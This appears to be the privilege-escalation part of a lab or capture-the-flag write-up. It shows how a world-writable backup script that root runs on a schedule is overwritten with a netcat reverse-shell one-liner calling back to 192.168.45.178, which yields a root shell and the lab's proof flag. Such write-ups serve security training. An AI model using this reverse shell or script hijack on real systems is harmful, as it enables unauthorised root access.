Priv Esc
snort@ochima:~$ tar xzf etc_backup.tar
gzip: stdin: not in gzip format
tar: Child returned status 1
tar: Error is not recoverable: exiting now
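Run pspy to watch for commands that other users, including root, run on a schedule. The directory listing that follows shows the misconfiguration this step relies on: /var/backups/etc_Backup.sh is owned by root but has mode -rwxrwxrwx, so any local user can replace its contents. A script that root executes should be writable only by root.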
snort@ochima:~$ ls -la /var/backups/
total 836
drwxr-xr-x 2 root root 4096 Oct 23 15:42 .
drwxr-xr-x 14 root root 4096 Dec 11 2023 ..
-rw-r--r-- 1 root root 61440 Oct 23 14:57 alternatives.tar.0
-rw-r--r-- 1 root root 40970 Dec 11 2023 apt.extended_states.0
-rw-r--r-- 1 root root 4438 Dec 11 2023 apt.extended_states.1.gz
-rw-r--r-- 1 root root 3940 Oct 31 2023 apt.extended_states.2.gz
-rw-r--r-- 1 root root 0 Oct 23 14:57 dpkg.arch.0
-rw-r--r-- 1 root root 268 Jun 15 2022 dpkg.diversions.0
-rw-r--r-- 1 root root 172 Dec 11 2023 dpkg.statoverride.0
-rw-r--r-- 1 root root 716144 Dec 11 2023 dpkg.status.0
-rwxrwxrwx 1 root root 54 Dec 11 2023 etc_Backup.sh
snort@ochima:~$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.178 8338 >/tmp/f" > /var/backups/etc_Backup.sh
❯ nc -lnvp 8338
listening on [any] 8338 ...
connect to [192.168.45.178] from (UNKNOWN) [192.168.181.32] 51450
sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/proof.txt && ip addr
a6adc37be925ccc4b3403d0f47a79879
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:bf:8f:20 brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.181.32/24 brd 192.168.181.255 scope global ens160
valid_lft forever preferred_lft forever